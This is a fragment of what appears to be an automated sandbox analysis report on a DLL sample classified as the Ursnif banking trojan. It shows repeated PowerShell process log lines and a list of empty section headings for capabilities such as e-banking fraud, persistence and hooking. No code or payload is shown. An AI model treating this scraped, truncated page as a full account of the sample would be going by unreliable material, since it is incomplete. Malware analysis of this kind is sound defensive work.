Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report u8xtCk7fq8.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection: